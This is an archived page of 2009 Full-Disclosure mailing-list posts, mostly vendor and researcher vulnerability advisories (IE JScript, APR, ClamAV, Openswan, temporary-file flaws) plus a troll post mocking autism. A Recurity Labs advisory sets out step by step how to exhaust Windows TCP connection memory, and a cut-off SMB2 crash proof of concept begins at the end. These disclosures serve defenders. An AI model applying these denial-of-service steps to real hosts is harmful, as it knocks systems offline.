[Full-disclosure] ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability

2009-09-09 Thread ZDI Disclosures
ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-062
September 8, 2009

-- CVE ID:
CVE-2009-1920

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8436.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists when parsing the jscript keyword arguments.
Because the arguments object is not available until a certain time,
invoking it can result in memory corruption. Successful exploitation of
this vulnerability can lead to a remote system compromise under the
credentials of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-045.mspx

-- Disclosure Timeline:
2009-04-28 - Vulnerability reported to vendor
2009-09-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* ling  wushi of team509

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] R. RHEL, RHCS, and Selinux : hype, reality or dream?

2009-09-09 Thread yersinia
So it seems that it is not necessary to be a clever hacker as spender to
disable SELinux on a system
(http://grsecurity.net/~spender/exploit.txthttp://grsecurity.net/%7Espender/exploit.txt).
Just follow the directions of the vendor. This one require to disable
selinux for the proper function of one of its HA products, after years that
the same vendor was critical with commercial product, o badly compiled open
source for SELINUX execmem o textreloc issue,  because they require the
same.

http://marc.info/?l=selinuxm=125244025732144w=2


James Morris first answer

http://marc.info/?l=selinuxm=125245247920355w=2


So articles like this are just marketing?


http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/

Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread full-censorship
Central Security District of UK [MI7.5] shadowdong...@hush.com 
wrote:
I just go off the phone with intelligence


MI7 and the CIB (Upgraded from CIA++, super savage secret) have 
relayed to me in code that n3td3v security is coming back stronger 

than ever.


Over in Langley we know that n3td3v has the finest security 
tactics. Super fortified servers.

Ultra mega ram.

He is truly one of the most experienced blackhats in all the land. 

He is a master criminal.


In other news, Gary McKinnon, elite pentagon hacker is an autistic 

rockstar:

http://www.youtube.com/watch?v=XcOY0kWQaqc

He's milking the success of his crime, instead apologizing, he's 
gloating. I guess that teaches people hacking is OK.


My name is shadowdong007. Roger wilco.

- Gary McKinnon, CISSP, MD.

autistic only when I commit crimes, but really me when I'm on TV

this is not n3td3v - laywyer

this is a private mailing list, you're not allowed to say that. you 
should read up about public and private ownership.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ GLSA 200909-03 ] Apache Portable Runtime, APR Utility Library: Execution of arbitrary code

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Apache Portable Runtime, APR Utility Library: Execution of
arbitrary code
  Date: September 09, 2009
  Bugs: #280514
ID: 200909-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple integer overflows in the Apache Portable Runtime and its
Utility Library might allow for the remote execution of arbitrary code.

Background
==

The Apache Portable Runtime (aka APR) provides a set of APIs for
creating platform-independent applications. The Apache Portable Runtime
Utility Library (aka APR-Util) provides an interface to functionality
such as XML parsing, string matching and databases connections.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-libs/apr 1.3.8  = 1.3.8
  2  dev-libs/apr-util1.3.9  = 1.3.9
---
 2 affected packages on all of their supported architectures.
---

Description
===

Matt Lewis reported multiple Integer overflows in the apr_rmm_malloc(),
apr_rmm_calloc(), and apr_rmm_realloc() functions in misc/apr_rmm.c of
APR-Util and in memory/unix/apr_pools.c of APR, both occurring when
aligning memory blocks.

Impact
==

A remote attacker could entice a user to connect to a malicious server
with software that uses the APR or act as a malicious client to a
server that uses the APR (such as Subversion or Apache servers),
possibly resulting in the execution of arbitrary code with the
privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Apache Portable Runtime users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-libs/apr-1.3.8

All APR Utility Library users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-libs/apr-util-1.3.9

References
==

  [ 1 ] CVE-2009-2412
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-03.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-04 ] Clam AntiVirus: Multiple vulnerabilities

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Clam AntiVirus: Multiple vulnerabilities
  Date: September 09, 2009
  Bugs: #264834, #265545
ID: 200909-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in ClamAV allow for the remote execution of
arbitrary code or Denial of Service.

Background
==

Clam AntiVirus (short: ClamAV) is an anti-virus toolkit for UNIX,
designed especially for e-mail scanning on mail gateways.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-antivirus/clamav   0.95.2  = 0.95.2

Description
===

Multiple vulnerabilities have been found in ClamAV:

* The vendor reported a Divide-by-zero error in the PE (Portable
  Executable; Windows .exe) file handling of ClamAV (CVE-2008-6680).

* Jeffrey Thomas Peckham found a flaw in libclamav/untar.c, possibly
  resulting in an infinite loop when processing TAR archives in clamd
  and clamscan (CVE-2009-1270).

* Martin Olsen reported a vulnerability in the CLI_ISCONTAINED macro
  in libclamav/others.h, when processing UPack archives
  (CVE-2009-1371).

* Nigel disclosed a stack-based buffer overflow in the
  cli_url_canon() function in libclamav/phishcheck.c when processing
  URLs (CVE-2009-1372).

Impact
==

A remote attacker could entice a user or automated system to process a
specially crafted UPack archive or a file containing a specially
crafted URL, possibly resulting in the remote execution of arbitrary
code with the privileges of the user running the application, or a
Denial of Service. Furthermore, a remote attacker could cause a Denial
of Service by supplying a specially crafted TAR archive or PE
executable to a Clam AntiVirus instance.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Clam AntiVirus users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-antivirus/clamav-0.95.2

References
==

  [ 1 ] CVE-2008-6680
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6680
  [ 2 ] CVE-2009-1270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1270
  [ 3 ] CVE-2009-1371
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1371
  [ 4 ] CVE-2009-1372
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1372

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-04.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-05 ] Openswan: Denial of Service

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Openswan: Denial of Service
  Date: September 09, 2009
  Bugs: #264346, #275233
ID: 200909-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in the pluto IKE daemon of Openswan might
allow remote attackers to cause a Denial of Service.

Background
==

Openswan is an implementation of IPsec for Linux.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-misc/openswan   2.4.15 = 2.4.15

Description
===

Multiple vulnerabilities have been discovered in Openswan:

* Gerd v. Egidy reported a NULL pointer dereference in the Dead Peer
  Detection of the pluto IKE daemon as included in Openswan
  (CVE-2009-0790).

* The Orange Labs vulnerability research team discovered multiple
  vulnerabilities in the ASN.1 parser (CVE-2009-2185).

Impact
==

A remote attacker could exploit these vulnerabilities by sending
specially crafted R_U_THERE or R_U_THERE_ACK packets, or a specially
crafted X.509 certificate containing a malicious Relative Distinguished
Name (RDN), UTCTIME string or GENERALIZEDTIME string to cause a Denial
of Service of the pluto IKE daemon.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Openswan users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-misc/openswan-2.4.15

References
==

  [ 1 ] CVE-2009-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0790
  [ 2 ] CVE-2009-2185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2185

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-05.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-06 ] aMule: Parameter injection

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: aMule: Parameter injection
  Date: September 09, 2009
  Bugs: #268163
ID: 200909-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An input validation error in aMule enables remote attackers to pass
arbitrary parameters to a victim's media player.

Background
==

aMule is an eMule-like client for the eD2k and Kademlia networks,
supporting multiple platforms.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-p2p/amule2.2.5  = 2.2.5

Description
===

Sam Hocevar discovered that the aMule preview function does not
properly sanitize file names.

Impact
==

A remote attacker could entice a user to download a file with a
specially crafted file name to inject arbitrary arguments to the
victim's video player.

Workaround
==

There is no known workaround at this time.

Resolution
==

All aMule users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-p2p/amule-2.2.5

References
==

  [ 1 ] CVE-2009-1440
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1440

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-06.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-07 ] TkMan: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: TkMan: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #247540
ID: 200909-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in TkMan, allowing
for symlink attacks.

Background
==

TkMan is a graphical, hypertext manual page and Texinfo browser for
UNIX.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  app-text/tkman   2.2-r1= 2.2-r1

Description
===

Dmitry E. Oboukhov reported that TkMan does not handle the
/tmp/tkman# and /tmp/ll temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All TkMan users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-text/tkman-2.2-r1

References
==

  [ 1 ] CVE-2008-5137
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5137

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-07.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-08 ] C* music player: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: C* music player: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #250474
ID: 200909-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in the C* music
player, allowing for symlink attacks.

Background
==

The C* Music Player (cmus) is a modular and very configurable
ncurses-based audio player.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  media-sound/cmus  2.2.0-r1   = 2.2.0-r1

Description
===

Dmitry E. Oboukhov reported that cmus-status-display does not handle
the /tmp/cmus-status temporary file securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All C* music player users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =media-sound/cmus-2.2.0-r1

References
==

  [ 1 ] CVE-2008-5375
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5375

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-09 ] Screenie: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Screenie: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #250476
ID: 200909-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in Screenie,
allowing for symlink attacks.

Background
==

Screenie is a small screen frontend that is designed to be a session
handler.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  app-misc/screenie   1.30.0-r1   = 1.30.0-r1

Description
===

Dmitry E. Oboukhov reported that Screenie does not handle
/tmp/.screenie.# temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Screenie users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-misc/screenie-1.30.0-r1

References
==

  [ 1 ] CVE-2008-5371
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5371

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-10 ] LMBench: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: LMBench: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #246015
ID: 200909-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple insecure temporary file usage issues have been reported in
LMBench, allowing for symlink attacks.

Background
==

LMBench is a suite of simple, portable benchmarks for UNIX platforms.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  app-benchmarks/lmbench= 3Vulnerable!
---
 NOTE: Certain packages are still vulnerable. Users should migrate
   to another package if one is available or wait for the
   existing packages to be marked stable by their
   architecture maintainers.

Description
===

Dmitry E. Oboukhov reported that the rccs and STUFF scripts do not
handle /tmp/sdiff.# temporary files securely. NOTE: There might
be further occurances of insecure temporary file usage.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

LMBench has been removed from Portage. We recommend that users unmerge
LMBench:

# emerge --unmerge app-benchmarks/lmbench

References
==

  [ 1 ] CVE-2008-4968
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4968

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-11 ] GCC-XML: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: GCC-XML: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #245765
ID: 200909-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in GCC-XML allowing
for symlink attacks.

Background
==

GCC-XML is an XML output extension to the C++ front-end of GCC.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  dev-cpp/gccxml   0.9.0_pre20090516  = 0.9.0_pre20090516

Description
===

Dmitry E. Oboukhov reported that find_flags in GCC-XML does not handle
/tmp/*.cxx temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All GCC-XML users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-cpp/gccxml-0.9.0_pre20090516

References
==

  [ 1 ] CVE-2008-4957
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4957

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] TCP/IP Orphaned Connections Vulnerability

2009-09-09 Thread Fabian Yamaguchi
Hi,

concerning MS09-048 and in particular CVE-2009-1926, we would like to
publish the following advisory:

http://www.recurity-labs.com/content/pub/Microsoft_Windows_CVE-2009-1926_MS09-048.txt

regards,
Fabian fabs Yamaguchi, Recurity Labs GmbH



Recurity Labs GmbH
http://www.recurity-labs.com
entomol...@recurity-labs.com
Date: 09.09.2009


Vendor:Microsoft Corporation
Product:   Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity:  Moderate
CVE:   CVE-2009-1926


Vendor communication:
  
  09.12.2008  Initial notification sent to MSRC
  
  10.12.2008  Response from MSRC case manager - The report is
  being investigated.

  23.12.2008  Recurity Labs would like to know whether MSRC
  considers this a vulnerability. If not so, Recurity
  Labs would like to mention the issue in an upcoming
  talk on TCP Denial Of Service vulnerabilities at the
  25th Chaos Communication Congress (25C3).

  28.12.2008  Recurity Labs agrees not to mention the issue until
  MSRC has has a chance to classify it.

  09.01.2009  MSRC case manager asks for a copy of the
  presentation-slides.

  13.01.2009  Vulnerability is classified as a 'Moderate'
  DoS by MSRC.

  26.02.2009  Update on the issue by MSRC - A fix is scheduled for
  May or June.

  27.03.2009  Update on the issue by MSRC - The fix is still
  scheduled for June.

  08.05.2009  Update on the issue by MSRC - The fix is delayed to
  August.

  29.07.2009  Meeting the MSRC case manager at BlackHat USA and
  getting a t-shirt. Thanks, nice move.

  05.08.2009  Update on the issue by MSRC - The fix is ready but
  issues arose during testing. The release is rescheduled.

  09.09.2009  Microsoft releases MS09-048



Overview:
  
  The TCP/IP-Stack of the Microsoft Windows XP/Vista Operating System
  is vulnerable to a remote resource exhaustion vulnerability. By
  taking advantage of this vulnerability, an attacker can cause a
  connection's Transmission Control Block (TCB) to remain in memory for
  an indefinite amount of time without the need for the attacker to
  further maintain the connection's activity.
  
Description:

  The vulnerabilities exist in the implementation of TCP's flow-control
  mechanism, in particular due to incorrect handling of advertised
  zero-windows. Zero-windows may be advertised by a TCP after a
  connection enters the ESTABLISHED state to indicate that it is
  currently not able to accept any data due to limited
  buffer-space. Given that pending data exists, which the peer TCP
  needs to deliver, the peer then starts its persist-timer, which 
  periodically queries the value of the flow-control window by 
  issuing so called zero-window-probes. These probes are TCP segments 
  containing a single byte of payload, which force the receiver to 
  generate an acknowledgment, which in turn allows the peer to 
  receive an update on the current value of the flow-control window. 
  As a side effect, the retransmission-timer is disabled because 
  persist- and retransmission-timer are mutually exclusive. The 
  sending TCP is said to be in persist-state.

  In Windows XP and Windows Vista, connections, which are in the state
  FIN_WAIT_1 or FIN_WAIT_2 respectively do not ever terminate if
  the flow-control mechanism is in persist-state. This can be
  demonstrated as followed:

  1. The Attacker establishes TCP-connection with the target.
  2. The Attacker sends a specially crafted TCP-segment to the
 target. The segment must fulfill the following criteria:

  a) The advertised flow-control window is set to zero.

  b) If the layer5-application that is in possession of the
 socket associated with this connection does not automatically
 send data to the attacker, the segment needs to cause the
 application to do so.

  c) To increase the attack speed, the segment-data should cause
 the layer-5 application to terminate the connection as soon as
 possible. For example, if the layer-5 application is a
 web-server, a GET-Request, which references a non-existing
 resource, is a good choice. When targeting the NetBIOS Session
 Manager (port 139), simply sending an invalid request such as
 'abc\n' is sufficient.

  3. Since the layer-5 application closes the socket associated with the
 connection in response to the attacker's request, the connection
moves
 into state FIN_WAIT_1 and is now 

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread randomguy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
sk=showaction=viewid=64Itemid=15

is fd all 'bout trolls nao?

- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=

I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.

III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.

IV. PROOF OF CONCEPT
- -

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a  char in the Process Id High SMB
header field it dies with a
